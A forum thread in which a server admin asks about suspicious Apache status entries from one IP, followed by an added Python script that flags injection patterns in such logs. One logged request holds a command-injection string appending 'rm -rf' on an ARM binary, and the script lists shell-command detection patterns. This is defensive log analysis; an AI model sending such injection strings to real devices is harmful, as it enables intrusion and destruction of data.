Strange status in Apache status
Hi,
I have a strange status in my Apache Status:
The IP seems to be based in Russia and as I know the Russians are very good at hacking (USA vote) so I am wondering.
Can someone tell me more?
Thank you very much.
| 0-3 | 43083 | 0/60/557 | _ | 21.47 | 402 | 0 | 292342 | 0.0 | 2.38 | 19.60 | 176.57.220.137 | http/1.1 |
| 1-3 | 43396 | 0/149/321 | _ | 34.58 | 402 | 1 | 232453 | 0.0 | 4.80 | 11.85 | 176.57.220.137 | http/1.1 | host.domain.tld:80 | Akitaskid.arm7;rm+-rf+Akitaskid.arm7 Zyxel.arm7%3b%23&remoteSub |
Hey there! With "rm -rf" present in the status, it looks like this IP address could be attempting malicious traffic. If this were my system I would likely block that IP address. If you know you should not be seeing any traffic from a certain country, you could use a country-code block in a tool like CSF to block the entire country at the firewall level.
This is what is weird, because I blocked Russia in cPHulk but it still seems to pass. Is it dangerous or not?
No country code range is ever perfect, so it's possible that didn't get identified as coming from the listed country. While the commands that person is trying would not run with that type of connection, that IP is clearly looking for vulnerabilities.
OK, I will block the IP ^^ Thank you
You're welcome!
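Added example (not part of the original thread): a small Python check that does by script what the replies above do by eye, URL-decoding the request column of pasted status rows and listing client IPs whose requests carry shell-command patterns. The rule list, the function names and the third (benign) sample row are assumptions made for illustration; the first two rows are the ones from the question.

```python
import re
from urllib.parse import unquote_plus

# Rows 1-2 are copied from the question; row 3 is a constructed benign request.
SAMPLE_ROWS = """\
| 0-3 | 43083 | 0/60/557 | _ | 21.47 | 402 | 0 | 292342 | 0.0 | 2.38 | 19.60 | 176.57.220.137 | http/1.1 |
| 1-3 | 43396 | 0/149/321 | _ | 34.58 | 402 | 1 | 232453 | 0.0 | 4.80 | 11.85 | 176.57.220.137 | http/1.1 | host.domain.tld:80 | Akitaskid.arm7;rm+-rf+Akitaskid.arm7 Zyxel.arm7%3b%23&remoteSub |
| 2-3 | 43401 | 0/12/88 | _ | 1.02 | 3 | 0 | 1024 | 0.0 | 0.10 | 0.90 | 192.0.2.10 | http/1.1 | host.domain.tld:80 | GET /index.php?id=5&page=2 HTTP/1.1 |
"""

IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

# Assumed starter rules; "&" is not flagged because it is normal in query strings.
RULES = [
    ("shell separator followed by a command",
     re.compile(r"[;|`]\s*(rm|wget|curl|chmod|sh|bash)\b")),
    ("recursive forced delete", re.compile(r"\brm\s+-rf\b")),
    ("command substitution", re.compile(r"\$\(")),
]

def parse_row(line):
    """Return (client_ip, request) from one pipe-delimited status row, or None."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    for i, cell in enumerate(cells):
        if IPV4.match(cell):
            # Client is followed by protocol, vhost, then the request. A raw "|"
            # inside the request would have been split, so rejoin the remainder.
            return cell, "|".join(cells[i + 3:])
    return None

def suspicious_clients(status_text):
    """Map client IP -> sorted list of rule names matched by its requests."""
    hits = {}
    for line in status_text.splitlines():
        parsed = parse_row(line)
        if not parsed or not parsed[1]:
            continue  # not a worker row, or a slot with no request recorded
        ip, request = parsed
        decoded = unquote_plus(request)  # "+" -> space, "%3b" -> ";"
        reasons = {name for name, rx in RULES if rx.search(decoded)}
        if reasons:
            hits.setdefault(ip, set()).update(reasons)
    return {ip: sorted(names) for ip, names in hits.items()}

if __name__ == "__main__":
    for ip, reasons in suspicious_clients(SAMPLE_ROWS).items():
        print(ip, "->", ", ".join(reasons))
```

Decoding before matching matters here: in the raw row the command appears as `rm+-rf+`, which a plain search for `rm -rf` would miss.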